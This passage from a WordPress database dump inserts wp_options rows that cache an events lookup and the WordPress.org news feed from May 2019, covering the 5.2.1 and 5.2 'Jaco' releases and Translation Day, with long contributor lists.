(762, '_site_transient_community-events-c548491ea93620339ffcc926d5a62016', 'a:2:{s:8:"location";a:1:{s:2:"ip";s:12:"172.17.166.0";}s:6:"events";a:1:{i:0;a:7:{s:4:"type";s:8:"wordcamp";s:5:"title";s:15:"WordCamp Europe";s:3:"url";s:33:"https://2019.europe.wordcamp.org/";s:6:"meetup";s:0:"";s:10:"meetup_url";s:0:"";s:4:"date";s:19:"2019-06-20 00:00:00";s:8:"location";a:4:{s:8:"location";s:15:"Berlin, Germany";s:7:"country";s:2:"DE";s:8:"latitude";d:52.506970000000003;s:9:"longitude";d:13.2843064;}}}}', 'no'),
(763, '_transient_timeout_feed_9bbd59226dc36b9b26cd43f15694c5c3', '1558961195', 'no');
INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(764, '_transient_feed_9bbd59226dc36b9b26cd43f15694c5c3', 'a:4:{s:5:"child";a:1:{s:0:"";a:1:{s:3:"rss";a:1:{i:0;a:6:{s:4:"data";s:3:"\n\n\n";s:7:"attribs";a:1:{s:0:"";a:1:{s:7:"version";s:3:"2.0";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:1:{s:0:"";a:1:{s:7:"channel";a:1:{i:0;a:6:{s:4:"data";s:49:"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n		\n		\n		\n		\n		\n		\n		\n		\n		\n	";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:27:"News –  – WordPress.org";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:26:"https://wordpress.org/news";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:14:"WordPress News";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:13:"lastBuildDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 21 May 2019 19:13:08 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"language";a:1:{i:0;a:5:{s:4:"data";s:5:"en-US";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:9:"generator";a:1:{i:0;a:5:{s:4:"data";s:40:"https://wordpress.org/?v=5.3-alpha-45430";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"item";a:10:{i:0;a:6:{s:4:"data";s:51:"\n		\n		\n				\n		\n				\n		\n\n		\n				\n								\n										";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:35:"WordPress 5.2.1 Maintenance Release";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:71:"https://wordpress.org/news/2019/05/wordpress-5-2-1-maintenance-release/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 21 May 2019 19:04:49 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:2:{i:0;a:5:{s:4:"data";s:8:"Releases";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:5:"5.2.1";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=6976";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:405:"WordPress 5.2.1 is now available! This maintenance release fixes 33 bugs, including improvements to the block editor, accessibility, internationalization, and the Site Health feature introduced in 5.2. You can browse the&#160;full list of changes on Trac. WordPress 5.2.1 is a short-cycle maintenance release. Version 5.2.2 is expected to follow in approximately two weeks. You can&#160;download [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:19:"Jonathan Desrosiers";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:4923:"\n<p>WordPress 5.2.1 is now available! This maintenance release fixes 33 bugs, including improvements to the block editor, accessibility, internationalization, and the Site Health feature <a href="https://wordpress.org/news/2019/05/jaco/">introduced in 5.2</a>.</p>\n\n\n\n<p>You can browse the&nbsp;<a href="https://core.trac.wordpress.org/query?status=closed&amp;resolution=fixed&amp;milestone=5.2.1&amp;order=priority">full list of changes on Trac</a>.</p>\n\n\n\n<p>WordPress 5.2.1 is a short-cycle maintenance release. <a href="https://core.trac.wordpress.org/query?milestone=5.2.2">Version 5.2.2</a> is expected to follow in approximately two weeks.</p>\n\n\n\n<p>You can&nbsp;download <a href="https://wordpress.org/download/">WordPress 5.2.1</a>&nbsp;or visit <strong>Dashboard → Updates</strong> and click&nbsp;<strong>Update Now</strong>. Sites that support automatic background updates have already started to update automatically.</p>\n\n\n\n<p>Jonathan Desrosiers and William Earnhardt co-led this release, with contributions from 52 other contributors. Thank you to everyone that made this release possible!</p>\n\n\n\n<p><a href="https://profiles.wordpress.org/xavortm/">Alex Dimitrov</a>, <a href="https://profiles.wordpress.org/tellyworth/">Alex Shiels</a>, <a href="https://profiles.wordpress.org/afercia/">Andrea Fercia</a>, <a href="https://profiles.wordpress.org/aduth/">Andrew Duthie</a>, <a href="https://profiles.wordpress.org/azaozz/">Andrew Ozz</a>, <a href="https://profiles.wordpress.org/rarst/">Andrey &#8220;Rarst&#8221; Savchenko</a>, <a href="https://profiles.wordpress.org/afragen/">Andy Fragen</a>, <a href="https://profiles.wordpress.org/anischarolia/">anischarolia</a>, <a href="https://profiles.wordpress.org/birgire/">Birgir Erlendsson (birgire)</a>, <a href="https://profiles.wordpress.org/chesio/">chesio</a>, <a href="https://profiles.wordpress.org/chetan200891/">Chetan Prajapati</a>, <a href="https://profiles.wordpress.org/daxelrod/">daxelrod</a>, <a href="https://profiles.wordpress.org/dkarfa/">Debabrata Karfa</a>, <a href="https://profiles.wordpress.org/odminstudios/">Dima</a>, <a href="https://profiles.wordpress.org/dd32/">Dion Hulse</a>, <a href="https://profiles.wordpress.org/ocean90/">Dominik Schilling</a>, <a href="https://profiles.wordpress.org/iseulde/">Ella van Durpe</a>, <a href="https://profiles.wordpress.org/edocev/">Emil Dotsev</a>, <a href="https://profiles.wordpress.org/sachyya-sachet/">ghoul</a>, <a href="https://profiles.wordpress.org/gziolo/">Grzegorz (Greg) Ziółkowski</a>, <a href="https://profiles.wordpress.org/gwwar/">gwwar</a>, <a href="https://profiles.wordpress.org/hareesh-pillai/">Hareesh</a>, <a href="https://profiles.wordpress.org/ianbelanger/">Ian Belanger</a>, <a href="https://profiles.wordpress.org/imath/">imath</a>, <a href="https://profiles.wordpress.org/audrasjb/">Jb Audras</a>, <a href="https://profiles.wordpress.org/jeremyfelt/">Jeremy Felt</a>, <a href="https://profiles.wordpress.org/joen/">Joen Asmussen</a>, <a href="https://profiles.wordpress.org/desrosj/">Jonathan Desrosiers</a>, <a href="https://profiles.wordpress.org/spacedmonkey/">Jonny Harris</a>, <a href="https://profiles.wordpress.org/chanthaboune/">Josepha</a>, <a href="https://profiles.wordpress.org/jrf/">jrf</a>, <a href="https://profiles.wordpress.org/kjellr/">kjellr</a>, <a href="https://profiles.wordpress.org/clorith/">Marius L. J.</a>, <a href="https://profiles.wordpress.org/mikengarrett/">MikeNGarrett</a>, <a href="https://profiles.wordpress.org/dimadin/">Milan Dinić</a>, <a href="https://profiles.wordpress.org/mukesh27/">Mukesh Panchal</a>, <a href="https://profiles.wordpress.org/onlanka/">onlanka</a>, <a href="https://profiles.wordpress.org/paragoninitiativeenterprises/">paragoninitiativeenterprises</a>, <a href="https://profiles.wordpress.org/parkcityj/">parkcityj</a>, <a href="https://profiles.wordpress.org/peterwilsoncc/">Peter Wilson</a>, <a href="https://profiles.wordpress.org/presskopp/">Presskopp</a>, <a href="https://profiles.wordpress.org/youknowriad/">Riad Benguella</a>, <a href="https://profiles.wordpress.org/sergeybiryukov/">Sergey Biryukov</a>, <a href="https://profiles.wordpress.org/netweb/">Stephen Edgar</a>, <a href="https://profiles.wordpress.org/sebastienserre/">Sébastien SERRE</a>, <a href="https://profiles.wordpress.org/tfrommen/">Thorsten Frommen</a>, <a href="https://profiles.wordpress.org/hedgefield/">Tim Hengeveld</a>, <a href="https://profiles.wordpress.org/timothyblynjacobs/">Timothy Jacobs</a>, <a href="https://profiles.wordpress.org/timph/">timph</a>, <a href="https://profiles.wordpress.org/tobiasbg/">TobiasBg</a>, <a href="https://profiles.wordpress.org/tonybogdanov/">tonybogdanov</a>, <a href="https://profiles.wordpress.org/tobifjellner/">Tor-Bjorn Fjellner</a>, <a href="https://profiles.wordpress.org/earnjam/">William Earnhardt</a>, and <a href="https://profiles.wordpress.org/fierevere/">Yui</a>.</p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"6976";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:1;a:6:{s:4:"data";s:51:"\n		\n		\n				\n		\n				\n		\n\n		\n				\n								\n										";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:39:"Tomorrow is WordPress Translation Day 4";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:75:"https://wordpress.org/news/2019/05/tomorrow-is-wordpress-translation-day-4/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 10 May 2019 09:17:48 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:2:{i:0;a:5:{s:4:"data";s:13:"Documentation";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:6:"Events";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=6961";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:342:"The fourth edition of WordPress translation day is coming up on Saturday 11 May 2019: tomorrow! Get ready for a 24-hour, global marathon dedicated to localizing the WordPress platform and ecosystem. This event takes place both online and in physical locations across the world, so you can join no matter where you are! The WordPress [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Joost de Valk";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:3747:"\n<p><em>The fourth edition of WordPress translation day is coming up on Saturday 11 May 2019: tomorrow! Get ready for a 24-hour, global marathon dedicated to localizing the WordPress platform and ecosystem.</em> <em>This event takes place both online and in physical locations across the world, so you can join no matter where you are! </em></p>\n\n\n\n<p>The <a href="https://make.wordpress.org/polyglots/">WordPress Polyglots Team</a> has a mission to translate and make available the software’s features into as many languages as possible. As WordPress powers more than 33% of websites, people from across the world use it in their daily life. That means there is a lot that needs translating, and into many different languages. </p>\n\n\n\n<p>On 11 May 2019, from 00:00 UTC until 23:59 UTC, <a href="https://wptranslationday.org/">WordPress Translation Day</a> aims to celebrate the thousands of volunteers who contribute to translation and internalization. The event is also an opportunity for encouraging more people to get involved and help increase the availability of themes and plugins in different languages.</p>\n\n\n\n<figure class="wp-block-pullquote"><blockquote><p>&#8220;At the time of the last event in 2017, WordPress was being translated into 178 languages, we have now reached the 200 mark!&#8221;</p><cite>WPtranslationday.org</cite></blockquote></figure>\n\n\n\n<h2>What happens on WordPress Translation Day?</h2>\n\n\n\n<p>There are a number of <a href="https://wptranslationday.org/the-local-events/">local meetings all over the world</a>, as well as online talks by people from the WordPress community. More than 700 people from around the world took part in past WordPress Translation Days, and everyone welcome to join in this time around!</p>\n\n\n\n<p>Everyone is welcome to join the event to help translate and localize WordPress, no matter their level of experience. A lot is happening on the day, so join in and you will learn how to through online sessions!</p>\n\n\n\n<h3>What can you expect?</h3>\n\n\n\n<ul><li><strong>Live online training</strong>: Tutorials in different languages focused on translation and <em>localization</em>, or l10n, of WordPress. These are streamed in multiple languages</li><li><strong>Localization sessions</strong>: General instruction and specifics for particular areas and languages. These sessions are streamed in multiple languages.</li><li><strong>Internalization sessions</strong>: Tutorials about optimizing the code to ease localization processes, also called <em>internationalization</em> or i18n. These sessions are streamed in English.</li><li><strong>Local events</strong>: Polyglot contributors will gather around the world for socializing, discussing, and translating together.</li><li><strong>Remote events</strong>: Translation teams that cannot gather physically, will connect remotely. They will be available for training, mentoring, and supporting new contributors. They will also engage in &#8220;translating marathons&#8221;, in which existing teams translate as many strings as they can!</li></ul>\n\n\n\n<p>A number of experienced WordPress translators and internationalization experts are part of the line-up for the livestream, joined by some first time contributors. </p>\n\n\n\n<p>Whether you have or haven&#8217;t contributed to the Polyglots before, you can join in for WordPress Translation Day. Learn more about both local and online events and stay updated through the website and social media. </p>\n\n\n\n<ul><li><a href="https://wptranslationday.org/">WordPress Translation Day website</a></li><li><a href="https://twitter.com/translatewp">WordPress Translation Day Twitter</a></li><li><a href="https://www.facebook.com/WPTranslationDay/">WordPress Translation Day Facebook</a></li></ul>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"6961";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:2;a:6:{s:4:"data";s:48:"\n		\n		\n				\n		\n				\n\n		\n				\n								\n										";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:24:"WordPress 5.2 “Jaco”";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:40:"https://wordpress.org/news/2019/05/jaco/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 07 May 2019 21:03:35 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:1:{i:0;a:5:{s:4:"data";s:8:"Releases";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=6925";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:426:"Version 5.2 of WordPress is available for download or update in your WordPress dashboard. New features in this update make it easier than ever to fix your site if something goes wrong. There are even more robust tools for identifying and fixing configuration issues and fatal errors. Whether you are a developer helping clients or you manage your site solo, these tools can help get you the right information when you need it.";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:14:"Matt Mullenweg";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:31370:"\n<h2 style="text-align:center">Keeping Sites Safer</h2>\n\n\n\n<figure class="wp-block-image"><img src="https://i1.wp.com/wordpress.org/news/files/2019/05/about_maintain-wordpress-cropped.png?fit=632%2C500&amp;ssl=1" alt="" class="wp-image-6926" srcset="https://i1.wp.com/wordpress.org/news/files/2019/05/about_maintain-wordpress-cropped.png?w=1206&amp;ssl=1 1206w, https://i1.wp.com/wordpress.org/news/files/2019/05/about_maintain-wordpress-cropped.png?resize=300%2C237&amp;ssl=1 300w, https://i1.wp.com/wordpress.org/news/files/2019/05/about_maintain-wordpress-cropped.png?resize=768%2C608&amp;ssl=1 768w, https://i1.wp.com/wordpress.org/news/files/2019/05/about_maintain-wordpress-cropped.png?resize=1024%2C810&amp;ssl=1 1024w" sizes="(max-width: 632px) 100vw, 632px" /></figure>\n\n\n\n<p>Version 5.2 of WordPress, named “Jaco” in honor of renowned and revolutionary jazz bassist Jaco Pastorius, is available for download or update in your WordPress dashboard. New features in this update make it easier than ever to fix your site if something goes wrong.</p>\n\n\n\n<p>There are even more robust tools for identifying and fixing configuration issues and fatal errors. Whether you are a developer helping clients or you manage your site solo, these tools can help get you the right information when you need it.</p>\n\n\n\n<hr class="wp-block-separator" />\n\n\n\n<h3>Site Health Check</h3>\n\n\n\n<div class="wp-block-image"><figure class="alignleft is-resized"><img src="https://i2.wp.com/wordpress.org/news/files/2019/05/about_site-health.png?resize=205%2C143&#038;ssl=1" alt="" class="wp-image-6927" width="205" height="143" srcset="https://i2.wp.com/wordpress.org/news/files/2019/05/about_site-health.png?w=609&amp;ssl=1 609w, https://i2.wp.com/wordpress.org/news/files/2019/05/about_site-health.png?resize=300%2C210&amp;ssl=1 300w" sizes="(max-width: 205px) 100vw, 205px" data-recalc-dims="1" /></figure></div>\n\n\n\n<p>Building on the <a href="https://wordpress.org/news/2019/02/betty/">Site Health</a> features introduced in 5.1, this release adds two new pages to help debug common configuration issues. It also adds space where developers can include debugging information for site maintainers.</p>\n\n\n\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n\n\n\n<h3>PHP Error Protection</h3>\n\n\n\n<div class="wp-block-image"><figure class="alignleft is-resized"><img src="https://i1.wp.com/wordpress.org/news/files/2019/05/about_error-protection.png?resize=202%2C228&#038;ssl=1" alt="" class="wp-image-6930" width="202" height="228" srcset="https://i1.wp.com/wordpress.org/news/files/2019/05/about_error-protection.png?w=487&amp;ssl=1 487w, https://i1.wp.com/wordpress.org/news/files/2019/05/about_error-protection.png?resize=267%2C300&amp;ssl=1 267w" sizes="(max-width: 202px) 100vw, 202px" data-recalc-dims="1" /></figure></div>\n\n\n\n<p>This administrator-focused update will let you safely fix or manage fatal errors without requiring developer time. It features better handling of the so-called “white screen of death,” and a way to enter recovery mode, &nbsp;which pauses error-causing plugins or themes.</p>\n\n\n\n<div style="height:79px" aria-hidden="true" class="wp-block-spacer"></div>\n\n\n\n<hr class="wp-block-separator" />\n\n\n\n<h2 style="text-align:center">Improvements for Everyone</h2>\n\n\n\n<h3>Accessibility Updates</h3>\n\n\n\n<p>A number of changes work together to improve contextual awareness and keyboard navigation flow for those using screen readers and other assistive technologies.</p>\n\n\n\n<h3>New Dashboard Icons</h3>\n\n\n\n<p>Thirteen new icons including Instagram, a suite of icons for BuddyPress, and rotated Earth icons for global inclusion. Find them in the Dashboard and have some fun!</p>\n\n\n\n<h3>Plugin Compatibility Checks</h3>\n\n\n\n<p>WordPress will now automatically determine if your site’s version of PHP is compatible with installed plugins. If the plugin requires a higher version of PHP than your site currently uses, WordPress will not allow you to activate it, preventing potential compatibility errors.</p>\n\n\n\n<hr class="wp-block-separator" />\n\n\n\n<h2 style="text-align:center">Developer Happiness</h2>\n\n\n\n<div class="wp-block-columns has-2-columns">\n<div class="wp-block-column">\n<p><a href="https://make.wordpress.org/core/2019/03/26/coding-standards-updates-for-php-5-6/"><strong>PHP Version Bump</strong></a><strong> </strong></p>\n\n\n\n<p>The minimum supported PHP version is now 5.6.20. As of WordPress 5.2*, themes and plugins can safely take advantage of namespaces, anonymous functions, and more!</p>\n</div>\n\n\n\n<div class="wp-block-column">\n<p><a href="https://make.wordpress.org/core/2019/04/24/developer-focused-privacy-updates-in-5-2/"><strong>Privacy Updates</strong></a><strong> </strong></p>\n\n\n\n<p>A new theme page template, a conditional function, and two CSS classes make designing and customizing the Privacy Policy page easier.</p>\n</div>\n</div>\n\n\n\n<div class="wp-block-columns has-2-columns">\n<div class="wp-block-column">\n<p><strong><a href="https://make.wordpress.org/core/2019/04/24/miscellaneous-developer-updates-in-5-2/">New Body Hook</a> </strong></p>\n\n\n\n<p>5.2 introduces a wp_body_open hook, which lets themes support injecting code right at the beginning of the &lt;body&gt; element.</p>\n</div>\n\n\n\n<div class="wp-block-column">\n<p><a href="https://make.wordpress.org/core/2019/03/25/building-javascript/"><strong>Building JavaScript</strong></a></p>\n\n\n\n<p>With the addition of webpack and Babel configurations in the wordpress/scripts package, developers won&#8217;t have to worry about setting up complex build tools to write modern JavaScript.</p>\n</div>\n</div>\n\n\n\n<p><em>*If you are running an old version of PHP (less than 5.6.20), <a href="https://wordpress.org/support/update-php/">update your PHP</a> before installing 5.2.</em></p>\n\n\n\n<hr class="wp-block-separator" />\n\n\n\n<h2>The Squad</h2>\n\n\n\n<p>This release was led by&nbsp;<a href="http://ma.tt/">Matt Mullenweg</a>, <a href="https://josepha.blog/">Josepha Haden Chomphosy</a>, and&nbsp;<a href="https://pento.net/">Gary Pendergast</a>. They were graciously supported by 327 generous volunteer contributors. Load a Jaco Pastorius playlist on your favorite music service and check out some of their profiles:</p>\n\n\n<a href="https://profiles.wordpress.org/aaroncampbell">Aaron D. Campbell</a>, <a href="https://profiles.wordpress.org/jorbin">Aaron Jorbin</a>, <a href="https://profiles.wordpress.org/adamsilverstein">Adam Silverstein</a>, <a href="https://profiles.wordpress.org/adamsoucie">Adam Soucie</a>, <a href="https://profiles.wordpress.org/oztaser">Adil &#214;ztaşer</a>, <a href="https://profiles.wordpress.org/ajitbohra">Ajit Bohra</a>, <a href="https://profiles.wordpress.org/schlessera">Alain Schlesser</a>, <a href="https://profiles.wordpress.org/aldavigdis">Alda Vigd&#237;s</a>, <a href="https://profiles.wordpress.org/alexdenning">Alex Denning</a>, <a href="https://profiles.wordpress.org/xavortm">Alex Dimitrov</a>, <a href="https://profiles.wordpress.org/akirk">Alex Kirk</a>, <a href="https://profiles.wordpress.org/viper007bond">Alex Mills</a>, <a href="https://profiles.wordpress.org/tellyworth">Alex Shiels</a>, <a href="https://profiles.wordpress.org/lexiqueen">Alexis</a>, <a href="https://profiles.wordpress.org/alexislloyd">Alexis Lloyd</a>, <a href="https://profiles.wordpress.org/allancole">allancole</a>, <a href="https://profiles.wordpress.org/allendav">Allen Snook</a>, <a href="https://profiles.wordpress.org/arena">Andr&#233;</a>, <a href="https://profiles.wordpress.org/andraganescu">andraganescu</a>, <a href="https://profiles.wordpress.org/afercia">Andrea Fercia</a>, <a href="https://profiles.wordpress.org/andreamiddleton">Andrea Middleton</a>, <a href="https://profiles.wordpress.org/euthelup">Andrei Lupu</a>, <a href="https://profiles.wordpress.org/aandrewdixon">Andrew Dixon</a>, <a href="https://profiles.wordpress.org/aduth">Andrew Duthie</a>, <a href="https://profiles.wordpress.org/nacin">Andrew Nacin</a>, <a href="https://profiles.wordpress.org/azaozz">Andrew Ozz</a>, <a href="https://profiles.wordpress.org/rarst">Andrey "Rarst" Savchenko</a>, <a href="https://profiles.wordpress.org/nosolosw">Andrés Maneiro</a>, <a href="https://profiles.wordpress.org/afragen">Andy Fragen</a>, <a href="https://profiles.wordpress.org/andizer">Andy Meerwaldt</a>, <a href="https://profiles.wordpress.org/aniketpatel">Aniket Patel</a>, <a href="https://profiles.wordpress.org/anischarolia">anischarolia</a>, <a href="https://profiles.wordpress.org/atimmer">Anton Timmermans</a>, <a href="https://profiles.wordpress.org/vanyukov">Anton Vanyukov</a>, <a href="https://profiles.wordpress.org/avillegasn">Antonio Villegas</a>, <a href="https://profiles.wordpress.org/antonypuckey">antonypuckey</a>, <a href="https://profiles.wordpress.org/aristath">Aristeides Stathopoulos</a>, <a href="https://profiles.wordpress.org/wpboss">Aslam Shekh</a>, <a href="https://profiles.wordpress.org/axaak">axaak</a>, <a href="https://profiles.wordpress.org/pixolin">Bego Mario Garde</a>, <a href="https://profiles.wordpress.org/empireoflight">Ben Dunkle</a>, <a href="https://profiles.wordpress.org/britner">Ben Ritner - Kadence Themes</a>, <a href="https://profiles.wordpress.org/bfintal">Benjamin Intal</a>, <a href="https://profiles.wordpress.org/billerickson">Bill Erickson</a>, <a href="https://profiles.wordpress.org/birgire">Birgir Erlendsson</a>, <a href="https://profiles.wordpress.org/bodohugobarwich">Bodo (Hugo) Barwich</a>, <a href="https://profiles.wordpress.org/gitlost">bonger</a>, <a href="https://profiles.wordpress.org/boonebgorges">Boone Gorges</a>, <a href="https://profiles.wordpress.org/bradleyt">Bradley Taylor</a>, <a href="https://profiles.wordpress.org/kraftbj">Brandon Kraft</a>, <a href="https://profiles.wordpress.org/brentswisher">Brent Swisher</a>, <a href="https://profiles.wordpress.org/burhandodhy">Burhan Nasir</a>, <a href="https://profiles.wordpress.org/cathibosco1">Cathi Bosco</a>, <a href="https://profiles.wordpress.org/chetan200891">Chetan Prajapati</a>, <a href="https://profiles.wordpress.org/chiaralovelaces">Chiara Magnani</a>, <a href="https://profiles.wordpress.org/chouby">Chouby</a>, <a href="https://profiles.wordpress.org/chrisvanpatten">Chris Van Patten</a>, <a href="https://profiles.wordpress.org/dswebsme">D.S. Webster</a>, <a href="https://profiles.wordpress.org/colorful-tones">Damon Cook</a>, <a href="https://profiles.wordpress.org/danielbachhuber">Daniel Bachhuber</a>, <a href="https://profiles.wordpress.org/danieltj">Daniel James</a>, <a href="https://profiles.wordpress.org/diddledan">Daniel Llewellyn</a>, <a href="https://profiles.wordpress.org/talldanwp">Daniel Richards</a>, <a href="https://profiles.wordpress.org/mte90">Daniele Scasciafratte</a>, <a href="https://profiles.wordpress.org/nerrad">Darren Ethier</a>, <a href="https://profiles.wordpress.org/drw158">Dave Whitley</a>, <a href="https://profiles.wordpress.org/davefx">DaveFX</a>, <a href="https://profiles.wordpress.org/davetgreen">davetgreen</a>, <a href="https://profiles.wordpress.org/davidbaumwald">David Baumwald</a>, <a href="https://profiles.wordpress.org/davidbinda">David Binovec</a>, <a href="https://profiles.wordpress.org/david.binda">David Binovec</a>, <a href="https://profiles.wordpress.org/dlh">David Herrera</a>, <a href="https://profiles.wordpress.org/dgroddick">David Roddick</a>, <a href="https://profiles.wordpress.org/get_dave">David Smith</a>, <a href="https://profiles.wordpress.org/folletto">Davide ''Folletto'' Casali</a>, <a href="https://profiles.wordpress.org/daxelrod">daxelrod</a>, <a href="https://profiles.wordpress.org/dkarfa">Debabrata Karfa</a>, <a href="https://profiles.wordpress.org/dekervit">dekervit</a>, <a 